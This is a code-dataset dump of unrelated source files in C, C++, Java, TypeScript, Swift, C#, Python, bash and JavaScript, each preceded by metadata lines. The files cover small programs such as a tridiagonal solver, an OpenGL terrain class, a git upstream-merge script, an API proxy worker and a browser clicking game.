if ((max = len < (HISTMAX / 2) ? (HISTMAX / 2) - len : 0))
load_history(&old, path);
if (old.size > max)
del_history(&old, 0, old.size - max);
if ((path = path ? ft_strjoin(path, "/.minihistory") : NULL)
&& (fd = open(path, O_TRUNC | O_WRONLY | O_CREAT
| O_NOFOLLOW, 0600)) != -1)
{
write_history(fd, &old, 0, old.size);
write_history(fd, hist, hist->size - len, len);
close(fd);
}
del_history(&old, 0, old.size);
del_history(hist, 0, hist->size);
ft_memdel((void **)&path);
}
|
C
|
UTF-8
| 1,107 | 3.421875 | 3 |
[] |
no_license
|
#include <stdio.h>
#include <stdlib.h>
#define real double
int main()
{
/* Matrix Size */
int m = 15;
/* Main Diagonal */
real *b = (real*)malloc(m*sizeof(real));
/* Lower Off Diagonal */
real *a = (real*)malloc(m*sizeof(real));
/* Upper Off Diagonal */
real *c = (real*)malloc(m*sizeof(real));
/* Right Hand Side */
real *d = (real*)malloc(m*sizeof(real));
/* Solution */
real *x = (real*)malloc(m*sizeof(real));
/* Initialize variables */
int i;
for ( i = 0 ; i < m ; i++)
{
b[i] = 2.0;
a[i] = -1.0;
c[i] = -1.0;
d[i] = 1.0 ;
}
a[0] = 0;
c[m-1]= 0;
/* Compute New Coefficients */
for ( i = 1 ; i < m ; i++)
{
b[i] = c[i-1] - b[i]*b[i-1]/a[i];
c[i] = -c[i]*b[i-1]/a[i];
d[i] = d[i-1] - d[i]*b[i-1]/a[i];
}
/* Back Substitution */
x[m-1] = d[m-1]/b[m-1];
for ( i = m-2 ; i >=0 ; i--)
x[i] = d[i]/b[i] - c[i]*x[i+1]/b[i] ;
/* Print Solution */
for ( i = 0 ; i < m ; i++)
printf("x[%d]=%lf\n",i,x[i]);
free(a);
free(b);
free(c);
free(d);
return 0;
}
|
Java
|
UTF-8
| 362 | 2.796875 | 3 |
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
package contest.coci;
import java.util.HashSet;
import java.util.Scanner;
public class COCI_2006_MODULO {
static Scanner scan = new Scanner(System.in);
public static void main(String[] args) {
HashSet<Integer> set = new HashSet<Integer>();
for (int x = 0; x < 10; x++)
set.add(scan.nextInt() % 42);
System.out.println(set.size());
}
}
|
C++
|
UTF-8
| 3,119 | 2.75 | 3 |
[] |
no_license
|
#define GLEW_STATIC
#include <GL/glew.h>
#include <GLFW/glfw3.h>
#include <iostream>
#include "SOIL2\SOIL2.h"
#include <glm/glm.hpp>
#include <glm/gtc/matrix_transform.hpp>
#include <glm/gtc/type_ptr.hpp>
#include "Shaders.h"
#include <vector>
#include <string>
using namespace std;
GLuint texture;
class Terrain
{
public:
glm::vec3 terrainPos;
vector <float> vertices;
vector <int> indices;
string texturePath;
Terrain(glm::vec3 position, string texturePath, GLfloat bufferValues[], GLint indicesValues[])
{
this->terrainPos = position;
this->texturePath = texturePath;
for (int i = 0; i < 100; i++)
vertices.push_back(bufferValues[i]);
for (int i = 0; i < 30; i++)
indices.push_back(indicesValues[i]);
}
void drawTerrain(Shader ourShader)
{
GLuint VBO, VAO, EBO;
glGenVertexArrays(1, &VAO);
glGenBuffers(1, &VBO); // VBO allows to pass vertices values into the shader!!!
glGenBuffers(1, &EBO);
// Bind the Vertex Array Object first, then bind and set vertex buffer(s) and attribute pointer(s).
glBindVertexArray(VAO);
// ASSIGNING VBO AND EBO POINTERS
glBindBuffer(GL_ARRAY_BUFFER, VBO);
glBufferData(GL_ARRAY_BUFFER, vertices.size() * sizeof(GLfloat), &vertices[0], GL_STATIC_DRAW);
		glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, EBO); // EBO is similar to VBO in that it also uploads user-defined data, but here we supply an array of indices
		// so that shared vertices can be reused and drawn in any order
		glBufferData(GL_ELEMENT_ARRAY_BUFFER, indices.size() * sizeof(GLint), &indices[0], GL_STATIC_DRAW);
// position coordinate attribute
glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 5 * sizeof(GLfloat), (GLvoid*)0); // 6 * sizeof(GLfloat) if we are including colors and texture coords besides our vertex position coordinates //
glEnableVertexAttribArray(0);
// texture coordinate attribute
glVertexAttribPointer(2, 2, GL_FLOAT, GL_FALSE, 5 * sizeof(GLfloat), (GLvoid*)(3 * sizeof(GLfloat)));
glEnableVertexAttribArray(2); // the number must be incremented every time you call attribute arrays
// UNBIND VAO
glBindVertexArray(0);
glBindTexture(GL_TEXTURE_2D, texture);
GLint modelLoc = glGetUniformLocation(ourShader.CurrentShader, "model");
//ACTUAL DRAWING // there is also a translation matrix declared here
glBindVertexArray(VAO);
glm::mat4 model;
model = glm::translate(model, terrainPos);
glUniformMatrix4fv(modelLoc, 1, GL_FALSE, glm::value_ptr(model));
glDrawElements(GL_TRIANGLES, indices.size(), GL_UNSIGNED_INT, 0);
glBindVertexArray(0);
glDeleteVertexArrays(1, &VAO);
glDeleteBuffers(1, &VBO);
glDeleteBuffers(1, &EBO);
}
void loadTexture()
{
int text_width, text_height;
glGenTextures(1, &texture);
glBindTexture(GL_TEXTURE_2D, texture);
unsigned char* image = SOIL_load_image(texturePath.c_str(), &text_width, &text_height, 0, SOIL_LOAD_RGBA);
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, text_width, text_height, 0, GL_RGBA, GL_UNSIGNED_BYTE, image);
glGenerateMipmap(GL_TEXTURE_2D);
SOIL_free_image_data(image);
glBindTexture(GL_TEXTURE_2D, 0);
}
};
|
TypeScript
|
UTF-8
| 511 | 2.765625 | 3 |
[] |
no_license
|
export class ApprenantMessageAuth{
constructor(
private _apprenantId:number,
private _message:string,
private _isAuth:boolean
){}
get apprenantId(){return this._apprenantId};
get message(){return this._message};
get isAuth(){return this._isAuth};
set apprenantId(id:number){
this._apprenantId = id;
}
set message(message:string){
this._message = message;
}
set isAuth(isAuth:boolean){
this._isAuth = isAuth
}
}
|
C++
|
GB18030
| 708 | 3.046875 | 3 |
[] |
no_license
|
#pragma once
#ifndef CAMERA_H
#define CAMERA_H
#include"ray.h"
#include"vectors.h"
class Camera
{
public:
Camera() {};
~Camera() {};
virtual Ray generateRay(Vec2f point) = 0;
virtual float getTMin() const = 0;
private:
};
class OrthographicCamera :public Camera
{
public:
OrthographicCamera(Vec3f center, Vec3f direction, Vec3f up, float size);
~OrthographicCamera() {};
virtual Ray generateRay(Vec2f point) ;
virtual float getTMin() const ;
protected:
	Vec3f m_center;     // camera center position
	Vec3f m_direction;  // direction the camera is looking
	Vec3f m_horizontal; // horizontal axis of the image plane
	Vec3f m_up;         // up axis of the image plane
	float m_size;       // size of the image plane (screen)
	float m_tmin;       // minimum t value for generated rays
};
#endif // CAMERA_H
|
Shell
|
UTF-8
| 1,734 | 4.0625 | 4 |
[] |
no_license
|
#!/bin/bash
usage() {
cat <<-EOF
upstream - Fetch and merge upstream/master branch from original github project to local branch.
Usage:
upstream [OPTIONS] URL
Options:
-u | --upstream-branch UBR - remote branch at original project to merge frome (default: "master")
-m | --merge-branch MBR - local branch to merge to (default: "devel")
Args:
URL - upstream URL (where I've forked from)
Example:
1) upstream git@github.com:openmc-dev/openmc.git
2) upstream -m merger git@github.com:openmc-dev/openmc.git
3) upstream -u develop git@github.com:openmc-dev/openmc.git
EOF
}
mbr="devel"
ubr="master"
parse_args() {
while [[ -n "$1" ]]; do
if [[ "$1" == "-m" ]] || [[ "$1" == "--merge-branch" ]]; then
shift
mbr="$1"
shift
elif [[ "$1" == "-u" ]] || [[ "$1" == "--upstream-branch" ]]; then
shift
ubr="$1"
shift
else
break
fi
done
url="$1"
if [[ -z "$url" ]]; then
echo "ERROR: url argument is not specified."
usage
return 1
fi
echo "Merging $url@$ubr -> $mbr..."
}
set_upstream() {
set -e
git checkout master > /dev/null
git remote | grep upstream > /dev/null || git remote add upstream $url
git fetch upstream $ubr
git branch --list | grep $mbr > /dev/null && git checkout $mbr || git checkout -b $mbr
git merge upstream/$ubr
echo "Merge $url@$ubr -> $mbr is complete."
}
main() {
if [[ "$1" == "-h" ]] || [[ "$1" == "--help" ]]; then
usage
else
parse_args "$@" && set_upstream
fi
}
[[ -n $BATS_PREFIX ]] || main "$@"
|
Swift
|
UTF-8
| 510 | 2.625 | 3 |
[] |
no_license
|
//
// UILabel+Extension.swift
// 06_UISlider
//
// Created by Maksim Nosov on 14/07/2018.
// Copyright © 2018 Maksim Nosov. All rights reserved.
//
import UIKit
extension UILabel {
public convenience init(title: String) {
self.init()
self.layer.cornerRadius = 5
self.textColor = UIColor(white: 0.9, alpha: 0.8)
self.font = UIFont.systemFont(ofSize: 17)
self.textAlignment = .center
self.text = title
self.setAnchor(width: 0, height: 40)
}
}
|
C#
|
UTF-8
| 2,023 | 2.65625 | 3 |
[] |
no_license
|
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;
using WebApplication.Context;
using WebApplication.Helpers;
using WebApplication.Model;
using WebApplication.Models;
namespace WebApplication.Controllers
{
public class HomeController : BaseController
{
public ActionResult Index()
{
List<ProductModel> models = ProductHelper.GetProducts();
return View(models);
}
public ActionResult Delete(int productId)
{
Result result = ProductHelper.DeleteProduct(productId);
//if(result.IsSuccess) {do some great stuff with View and fancy JS } else{ Huston we have a problem !}
return RedirectToAction("Index");
}
public ActionResult ProductForm(int? productId)
{
ProductModel product = new ProductModel();
if(productId.HasValue && productId.Value > 0)
{
product = ProductHelper.GetProductModelById(productId.Value);
}
return PartialView("ProductForm", product);
}
public ActionResult Save(ProductModel model)
{
Result result = new Result();
if (ModelState.IsValid)
{
if (model.ProductID > 0)
{
result = ProductHelper.EditProduct(model);
}
else
{
result = ProductHelper.SaveProduct(model);
}
//For this I should make some frontend setup for user friendly messages fallbacks etc
//if (result.IsSuccess) { DOSomeGreatStuff() }else{ ComeOnYouCanDoIt() }
return RedirectToAction("Index");
}
else
{
//In case of some modelstate errors and stuff when server validation needed
return ProductForm(model.ProductID);
}
}
}
}
|
C++
|
UTF-8
| 3,230 | 3.0625 | 3 |
[] |
no_license
|
#include "PersonalBudget.h"
void PersonalBudget::userRegistration()
{
userManager.userRegistration();
}
void PersonalBudget::viewMainMenu()
{
system("cls");
cout << " MENU G\235\340WNE " << endl;
cout << "*****************************" << endl;
cout << "1. Rejestracja" << endl;
cout << "2. Logowanie" << endl;
cout << "3. Koniec programu" << endl;
cout << "*****************************" << endl;
cout << "Twoj wyb\242r: ";
}
void PersonalBudget::signupUser()
{
userManager.signupUser();
}
void PersonalBudget::mainMenu()
{
char choice='0';
do
{
viewMainMenu();
choice=AuxiliaryMethods::loadSign();
switch (choice)
{
case ('2'):
{
cout << endl << "LOGOWANIE" << endl;
signupUser();
if (userManager.getIdLoggedinUser()!=0)
userMenu();
break;
}
case ('1'):
{
cout << endl << "REJESTRACJA" << endl;
userRegistration();
break;
}
case ('3'):
{
exit(0);
}
default:
cout << endl << "Niepoprawny wyb\242r";
Sleep(1000);
break;
}
}
while (choice!='3');
}
void PersonalBudget::viewUserMenu()
{
system("cls");
cout<< " MENU U\275YTKOWNIKA" << endl;
cout<< "******************************" << endl;
cout << "1. Dodaj przych\242d" << endl;
cout << "2. Dodaj wydatek" << endl;
cout << "3. Bilans z bie\276\245cego miesi\245ca" << endl;
cout << "4. Bilans z poprzedniego miesi\245ca" << endl;
cout << "5. Bilans z wybranego okresu" << endl;
cout << "6. Zmie\344 has\210o" << endl;
cout << "8. Wyloguj si\251" << endl;
cout << "Tw\242j wyb\242r: ";
}
void PersonalBudget::userMenu()
{
char choice='0';
do
{
viewUserMenu();
balanceManager = new BalanceManager(NAME_FILE_WITH_INCOMES, NAME_FILE_WITH_EXPENSES, userManager.getIdLoggedinUser());
choice=AuxiliaryMethods::loadSign();
switch (choice)
{
case ('1'):
{
balanceManager->addIncome();
break;
}
case ('2'):
{
balanceManager->addExpense();
break;
}
case ('3'):
{
balanceManager->balanceCurrentMonth();
break;
}
case ('4'):
{
balanceManager->balancePreviousMonth();
system("pause");
break;
}
case ('5'):
{
balanceManager->balanceSelectedPeriod();
system("pause");
break;
}
case ('6'):
{
userManager.changePassword();
Sleep(1000);
break;
}
case ('8'):
{
logoutUser();
mainMenu();
break;
}
default:
cout << endl << "Niepoprawny wyb\242r";
Sleep(1500);
break;
}
}
while (choice!='8');
}
void PersonalBudget::logoutUser()
{
userManager.logoutUser();
delete balanceManager;
balanceManager = NULL;
}
|
Markdown
|
UTF-8
| 3,697 | 3.15625 | 3 |
[] |
no_license
|
# Titanic_Predictor
Kaggle's "Titanic: Machine Learning from Disaster" Competition
This is my attempt at the competition. I am currently ranked 1208 of 9553, and my best score is 79.904.
## My Approach
### EDA
I tried working with both all-categorical features and all-dummy features. This was done in the file **data_cleanup.py**. The steps I took to prepare both sets of features are below:
1. I immediately got rid of the _PassengerID_ as this would be no help.
2. I changed _Sex_ from "male" and "female" to 0 and 1. I made a lot of these string-to-int conversions because most of the ML models work best with ints.
3. I extracted the first letter from the _Cabin_ feature, converted it to an int and set it as the _CabinLetter_. This is done because _Cabin_ alone does not tell us much: most passengers have a unique cabin number, but just the letter of the cabin gives a bit more information.
4. I replaced the missing _Age_ values by guessing the person's age as the median age for their _Sex_ and _Pclass_. _Age_ was then converted into five different _AgeRange_ bins. The values for the ranges were chosen from the distribution of ages (see the pandas sketch after this list).
5. I created the feature _Title_ by extracting each passenger's title from their _Name_. _Name_ alone does not give much information since each full name is different. However, _Title_ is useful since it can also indicate what class the person is in.
6. I filled the missing values in _Embarked_ with the most common value "S". I then converted the values to ints.
7. I created the feature _FamilyMems_ by combining _Parch_ and _SibSp_. This gives the total number of family members a passenger has onboard.
8. I filled the missing values in _Fare_ with the most common value "NA". _Fare_ was then converted into five different ranges. The values for the ranges were chosen from the distribution of fares.
9. I extracted the prefix of each ticket and used 'XXX' for ones without a prefix.
10. I added three features _Singleton_, _SmallFamily_, and _LargeFamily_ based on _FamilyMems_.
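As a rough illustration of steps 4 and 5, the age imputation, age binning and title extraction might look like the sketch below in pandas (the bin edges and exact column names are illustrative guesses, not necessarily what **data_cleanup.py** does):
```python
import pandas as pd

def engineer_features(df: pd.DataFrame) -> pd.DataFrame:
    # Title from Name, e.g. "Braund, Mr. Owen Harris" -> "Mr"
    df["Title"] = df["Name"].str.extract(r",\s*([^.]+)\.", expand=False).str.strip()
    # Fill missing Age with the median age of the passenger's Sex/Pclass group
    df["Age"] = df.groupby(["Sex", "Pclass"])["Age"].transform(lambda s: s.fillna(s.median()))
    # Five age ranges (illustrative edges chosen from the age distribution)
    df["AgeRange"] = pd.cut(df["Age"], bins=[0, 16, 32, 48, 64, 120], labels=False)
    # Total number of family members on board
    df["FamilyMems"] = df["Parch"] + df["SibSp"]
    return df
```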
### Models
I tried four different models: Logistic Regression, Random Forest, AdaBoost, and XGBoost. Random Forest, AdaBoost, and XGBoost all performed fairly similarly, so I decided to focus on Random Forest. My models seem to be overfitting the data (exact values from all runs are in **notes.xlsx**): the scores on the training sets are much higher than on the test sets. Because of this I have decreased the number of features used; however, this doesn't seem to be helping. I might want to decrease it even more.
I've decreased the number of features to just the top 10 out of ~70. This has been performing better. Now I'll try different numbers of features.
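A minimal sketch of the 'top 10 of ~70' feature selection with a random forest could look like this (`X_train` and `y_train` are assumed names for the dummy-encoded training features and the Survived labels, not the project's actual variables):
```python
from sklearn.ensemble import RandomForestClassifier

forest = RandomForestClassifier(n_estimators=100, random_state=0)
forest.fit(X_train, y_train)
# Rank the dummy features by importance and keep the ten strongest
ranked = sorted(zip(forest.feature_importances_, X_train.columns), reverse=True)
top10 = [name for _, name in ranked[:10]]
model = RandomForestClassifier(random_state=0).fit(X_train[top10], y_train)
```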
All of the models are described below.
#### Logistic Regression
Best score: 76.555 with features: "Pclass", "Sex", "AgeRange", "Title"
#### Random Forest
Best score: 79.904 with features: Title_Mr, "Sex", "Title_Mrs", "Pclass_3", "Title_Miss", "Cabin_NA", "Fare_0", "Age_3", "Age_2", "Embarked_C" and default hyperparameters
Previous best score: 77.99 with features: Pclass, "Sex", "AgeRange", "Title", 'CabinLetter', 'Embarked', 'FamilyMems', 'Fare', 'IsAlone' and hyperparameters: {'criterion': 'entropy', 'max_depth': 30, 'max_features': 'sqrt', 'min_samples_leaf': 1, 'min_samples_split': 30, 'n_estimators': 10}
#### Adaboost
Best score: 77.99 with features: Pclass, "Sex", "AgeRange", "Title", 'CabinLetter', 'Embarked', 'FamilyMems', 'Fare' and hyperparameters: {n_estimators=10}
#### XGBoost
Best score: 77.511 with features: With Dummy Vars and hyperparameters: {'booster': 'gbtree', 'gamma': 0, 'learning_rate': 0.3, 'max_depth': 3, 'min_child_weight': 10, 'n_estimators': 30}
|
Java
|
UTF-8
| 751 | 3.28125 | 3 |
[] |
no_license
|
package com.sail.tree;
public class ReverseTree {
public static void reverseTree(TreeNode rootNode){
if (rootNode==null){return;}
TreeNode leftNode = rootNode.getLchild();
TreeNode rightNode = rootNode.getRchild();
rootNode.setRchild(leftNode);
rootNode.setLchild(rightNode);
reverseTree(leftNode);
reverseTree(rightNode);
}
public static TreeNode getReverseTree(TreeNode rootNode){
if (rootNode==null){
return null;
}
TreeNode treeNode = new TreeNode(rootNode.getVal());
treeNode.setRchild(getReverseTree(rootNode.getLchild()));
treeNode.setLchild(getReverseTree(rootNode.getRchild()));
return treeNode;
}
}
|
Python
|
UTF-8
| 2,162 | 3.71875 | 4 |
[] |
no_license
|
import pandas as pd
import numpy as np
############
#Given a list to be binned (input_list) and a list of bin values (bin_list),
#this function returns, for each element of input_list, the bin that the
#element falls into. If input_list is extremely long, writing a for loop or
#using pd.Series.apply may not be fast enough; this function uses pandas
#vectorized operations to keep the binning fast.
#Parameters:
#input_list: a python list to be binned
#bin_list: a python list with all the bin values
#logical_min: a float for the extreme lower bound
#logical_max: a float for the extreme upper bound
#Output:
#res_df: a dataframe with 3 columns ('input','lowerbound','upperbound')
def binning_func(input_list,bin_list,logical_min=-np.Inf,logical_max=np.Inf):
values = pd.Series(input_list)
val_df = pd.DataFrame({'val':values})
bin_values = pd.Series(list(set(bin_list)))
bin_values.sort_values(inplace=True)
bin_val_df = pd.DataFrame({'bin_val':bin_values})
bin_val_df['upperbound'] = bin_val_df.bin_val.shift(-1).fillna(logical_max)
bin_val_df.set_index('bin_val',inplace=True)
new_cols = []
for bv in bin_values:
val_df[f'{bv}'] = bv < val_df['val']
new_cols.append(f'{bv}')
mask_df = np.exp(pd.DataFrame([bin_list]*len(input_list),columns=new_cols))
masked_df = val_df[new_cols] * mask_df[new_cols]
lowerbounds = np.log(masked_df.max(axis=1)).replace(-np.Inf,logical_min)
res_df = pd.DataFrame({
'input':input_list,
'lowerbound':lowerbounds,
}).join(bin_val_df,on='lowerbound')
res_df['upperbound'] = res_df['upperbound'].fillna(bin_values.min())
return res_df
if __name__ == '__main__':
######sample usage 1:
######output:
###### input lowerbound upperbound
###### -1.2 -50.0 -1.1
###### -0.3 -1.1 0.0
###### 1.3 0.0 1.3
###### 3.0 2.0 3.0
###### 3.1 3.0 inf
input_list = [-1.2,-0.3,1.3,3.0,3.1]
bin_list = [-1.1,0.,1.3,1.5,2.,3.]
logical_min = -50.
logical_max = np.Inf
binning_func(input_list,bin_list,logical_min,logical_max)
|
C++
|
UTF-8
| 2,533 | 3.53125 | 4 |
[] |
no_license
|
/********************************************************
 * Program that reads a string and prints:              *
 * 1) the number of vowels in the string;               *
 * 2) the number of occurrences of each letter          *
 ********************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_CAD 1001
int eh_vogal(char);
int conta_vogais(char[]);
int eh_maiuscula(char);
int eh_minuscula(char);
void conta_letras(char[], int[]);
void mostra_contador_letras(int[]);
int main() {
int array_conta_letras[26] = {0};
char texto[MAX_CAD];
printf("Programa que le uma cadeia de caracteres e mostra: "
"a quantidade de vogais e a quantidade de cada letra diferente:\n\n");
printf("Digite uma cadeia de ate %d caracteres:\n\n", MAX_CAD - 1);
fgets(texto, MAX_CAD, stdin);
texto[strcspn(texto, "\n")] = '\0'; /* strip the trailing newline */
printf("\nCadeia lida:\n\n");
printf("%s\n\n", texto);
printf("Quantidade de vogais: %d\n\n", conta_vogais(texto));
conta_letras(texto, array_conta_letras);
mostra_contador_letras(array_conta_letras);
printf("\n\n");
system("pause");
return 0;
}
int eh_vogal(char caractere) {
if (caractere == 'A' || caractere == 'a' ||
caractere == 'E' || caractere == 'e' ||
caractere == 'I' || caractere == 'i' ||
caractere == 'O' || caractere == 'o' ||
caractere == 'U' || caractere == 'u')
return 1;
return 0;
}
int conta_vogais(char array[]) {
int indice, contador_vogais = 0;
for (indice = 0; array[indice] != '\0'; indice++)
if (eh_vogal(array[indice]))
contador_vogais++;
return contador_vogais;
}
int eh_maiuscula(char caractere) {
return caractere >= 'A' && caractere <= 'Z' ? 1 : 0;
}
int eh_minuscula(char caractere) {
return caractere >= 'a' && caractere <= 'z' ? 1 : 0;
}
void conta_letras(char cadeia[], int array_conta_letras[]) {
int indice;
for (indice = 0; cadeia[indice] != '\0'; indice++)
if (eh_maiuscula(cadeia[indice]))
array_conta_letras[cadeia[indice] - 'A']++;
else if (eh_minuscula(cadeia[indice]))
array_conta_letras[cadeia[indice] - 'a']++;
return;
}
void mostra_contador_letras(int array_conta_letras[]) {
int letra;
printf("Quantidade de cada letra:\n");
for (letra = 0; letra < 26; letra++) {
if (letra % 6 == 0)
printf("\n");
printf("%c = %3d ", letra + 'A', array_conta_letras[letra]);
}
return;
}
|
C#
|
UTF-8
| 1,596 | 2.859375 | 3 |
[
"MIT"
] |
permissive
|
using System;
using System.IO;
using Contracts = System.Diagnostics.Contracts;
#if CONTRACTS_FULL_SHIM
using Contract = System.Diagnostics.ContractsShim.Contract;
#else
using Contract = System.Diagnostics.Contracts.Contract; // SHIM'D
#endif
namespace KSoft.IO
{
/// <summary>Exposes the concept of a virtual buffer inside a stream</summary>
/// <remarks>No bytes are IO'd. Purely position based</remarks>
[Contracts.ContractClass(typeof(IKSoftStreamWithVirtualBufferContract))]
public interface IKSoftStreamWithVirtualBuffer
{
Stream BaseStream { get; }
/// <summary>Absolute position of the start of the virtual buffer</summary>
long VirtualBufferStart { get; set; }
/// <summary>How many bytes compose the virtual buffer</summary>
long VirtualBufferLength { get; set; }
};
[Contracts.ContractClassFor(typeof(IKSoftStreamWithVirtualBuffer))]
abstract class IKSoftStreamWithVirtualBufferContract : IKSoftStreamWithVirtualBuffer
{
public abstract Stream BaseStream { get; }
public long VirtualBufferStart {
get {
Contract.Ensures(Contract.Result<long>() >= 0);
throw new NotImplementedException();
}
set {
Contract.Requires<ArgumentOutOfRangeException>(value >= 0);
throw new NotImplementedException();
}
}
public long VirtualBufferLength {
get {
Contract.Ensures(Contract.Result<long>() >= 0);
throw new NotImplementedException();
}
set {
Contract.Requires<ArgumentOutOfRangeException>(value >= 0);
throw new NotImplementedException();
}
}
};
}
|
JavaScript
|
UTF-8
| 999 | 3.03125 | 3 |
[] |
no_license
|
/**
* An object with different URLs to fetch
* @param {Object} ORIGINS
*/
const ORIGINS = {
"swapi-proxy.truestack.workers.dev": "swapi.dev",
"api.starwars.run": "swapi.dev",
};
const regex = new RegExp("swapi.dev", "g");
async function handleRequest(request) {
const url = new URL(request.url);
// Check if incoming hostname is a key in the ORIGINS object
if (url.hostname in ORIGINS) {
const target = ORIGINS[url.hostname];
url.hostname = target;
// If it is, proxy request to that third party origin
const originalResponse = await fetch(url.toString(), request);
// Change response body by replacing the original API URL
const originalBody = await originalResponse.text();
return new Response(
originalBody.replace(regex, "api.starwars.run"),
originalResponse
);
}
// Otherwise, process request as normal
return await fetch(request);
}
addEventListener("fetch", (event) => {
event.respondWith(handleRequest(event.request));
});
|
Markdown
|
UTF-8
| 3,467 | 2.78125 | 3 |
[] |
no_license
|
第十章 惊人邪力(3)
姬翠尖叫道:“他已受伤,不要杀他!”
凌渡宇正奇怪姬翠为何仍能保持清醒和行动的能力时,黑影聚闪,庞度·鲁南由地上窜起来。
凌渡宇见到的只是他双眼闪现的黄芒。
“小心!”
凌渡宇大喝一声,把姬翠拉到身旁。
“砰!”
庞度·鲁南的肩头硬撞到囚门处,囚门反弹出来,重重擅在凌渡宇和姬翠身上。
无可抗御的巨力像海潮般涌来,两人立时变作滚地葫芦。
在触地前,凌渡宇再发一枪。
他身手的高明和不受邪力影响的能耐,显然大出正在不断淌血的庞度·鲁南意料之外,他正要从地上拾起另一支自动机枪,一发枪弹及时击中他左肩。
庞度·鲁南像旋风般打了两个转,仰跌地上,接着便往远离凌渡宇这群人的方向滚去。
走廊另一端这时拥来了十多名特种人员,人人骇然大喝“不准动”,但因投鼠忌器,却没有人敢开枪。
三名队员抢前往仍在地上翻滚的庞度·鲁南扑去。
这时凌渡宇刚扶姬翠站起来,见状知道不妙,狂喝道:“退回去!紧守出口!”
但已迟了一步。
庞度·鲁南继续前滚,所过处遗下触目惊心的血渍。
那冲过来的三名队员首先受邪力影响,仆往地面,而庞度·鲁南则从地上跳起来,此时守在另一端的人无不摇摇晃晃,脸上都现出神智不清和痛苦莫名的表情。
姬翠猛地从凌渡宇怀中扑出,疾若劲风般朝庞度·鲁南追去。
凌渡宇苦跟在她背后。
庞度·鲁南回头瞥了两人一眼,狞笑道:“迟些再和你们算账!”
一个闪身,他已奔到了出口外。
两人一先一后奔到出口处,机枪声轰然响起。
凌渡宇猛扑在姬翠娇躯上,两人同时倒地,避过了机枪的射击。
凌渡宇还了三枪。
夺得机枪的庞度·鲁南不知哪处被射中,惨哼一声,踏着被他射杀的队员的尸体奔到了另一出口去。
凌渡宇记得那是通往监狱广场的通道,大骇下奋起余力,跳将起来,狂追而去。
今趟姬翠迟了起步,却仍能保持紧跟在他身后的距离。
凌渡宇此时无暇去思索这个美人儿何来能与他比较的体力和精力,只顾冲往广场去。
机枪声密集响起。
当他踏足广场时,庞度·鲁南已夺得一架属特种部队的装甲车,全速朝紧闭的大门驶去。
“轰!”
整架车爆炸成一团烈焰,往上抛起,而大门亦给碰撞和爆炸摧毁成断块残屑。
二十多名把守广场的特种部队队员,不是倒在血泊内就是禁受不住邪力而倒地,连瞧一眼的能力也欠奉。
在装甲车撞上坚固的外闸前,庞度·鲁南由前座推开车门滚了出来,但爆炸浓烟四散,凌渡宇再看不到接下来的情况。
两人追出大门外时,明月仍高挂天上,但庞度·鲁南已影踪全无。
姬翠狠狠道:“竟让他溜了。”
凌渡宇沉声道:“我们仍有机会,他的能力尚是非常有限,现在消耗得七七八八,只要展开搜捕,说不定可把他擒回来。
否则明天他再吸取月能时,就是他授首的时刻,希望那时你不会再阻我杀他,因为我再不能容许他这么滥杀下去。”
|
JavaScript
|
UTF-8
| 2,653 | 2.625 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
// Copyright 2018 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
var countFrontWhitespace = function(line) {
var m = line.match(/^\s+/);
return m ? m[0].length : 0
};
var loadProperties = function(node, data) {
var start = 0;
var stop;
do {
var index = data.indexOf('=', start);
var property = new VN_Property(data.substring(start, index));
var index2 = data.indexOf(',', index + 1);
var length = parseInt(data.substring(index + 1, index2));
start = index2 + 1 + length;
property.value = data.substring(index2 + 1, index2 + 1 + length);
node.properties.push(property);
node.namedProperties[property.name] = property;
stop = start >= data.length;
if (!stop) {
start += 1;
}
} while (!stop);
node.sortProperties();
node.loadCommonProperties(commonProps);
}
/**
* Parses the view node data and returns the root node
*/
var parseNode = function(data) {
var stack = [];
var root = null;
var lastNode = null;
var lastWhitespaceCount = -INT_MIN_VALUE;
data = data.split("\n");
for (var l = 0; l < data.length - 1; l++) {
var line = data[l];
if (line.toUpperCase() == "DONE.") {
break;
}
var whitespaceCount = countFrontWhitespace(line);
if (lastWhitespaceCount < whitespaceCount) {
stack.push(lastNode);
} else if (stack.length) {
var count = lastWhitespaceCount - whitespaceCount;
for (var i = 0; i < count; i++) {
stack.pop();
}
}
lastWhitespaceCount = whitespaceCount;
line = line.trim();
var index = line.indexOf(' ');
lastNode = new ViewNode(line.substring(0, index));
line = line.substring(index + 1);
loadProperties(lastNode, line);
if (!root) {
root = lastNode;
}
if (stack.length) {
var parent = stack[stack.length - 1];
parent.children.push(lastNode);
}
}
root.updateNodeDrawn();
return root;
}
|
JavaScript
|
UTF-8
| 911 | 3.5625 | 4 |
[] |
no_license
|
let clickers = 50;
let startTime = Date.now();
// position element in the DOM
function sync(dom, pos) {
dom.style.left = `${pos.x}px`;
dom.style.top = `${pos.y}px`;
}
function addClicker() {
const pos = {
x: Math.random() * 500,
y: Math.random() * 300
};
const img = new Image();
img.src = "res/images/rick.png";
img.style.position = "absolute";
img.addEventListener("click", removeClicker, false);
document.querySelector("#board").appendChild(img);
sync(img, pos);
}
function removeClicker(e) {
e.target.parentNode.removeChild(e.target);
clickers--;
checkGameOver();
}
function checkGameOver() {
document.querySelector("#remain").innerHTML = clickers;
if (clickers === 0) {
const taken = Math.round((Date.now() - startTime) / 1000);
alert(`De-rick-ed in ${taken} seconds!`);
}
}
// Add all the Ricks!
for (let i = 0; i < clickers; i++) {
addClicker();
}
|
Java
|
ISO-8859-1
| 2,425 | 2.65625 | 3 |
[] |
no_license
|
package br.edu.ifsc.cds.DAO;
import java.util.ArrayList;
import java.util.List;
import javax.persistence.EntityManager;
import javax.persistence.Query;
import br.edu.ifsc.cds.DAO.Singleton.EntityMagerFactorySingleton;
import br.edu.ifsc.cds.DAO.interfaces.IExercicioDAO;
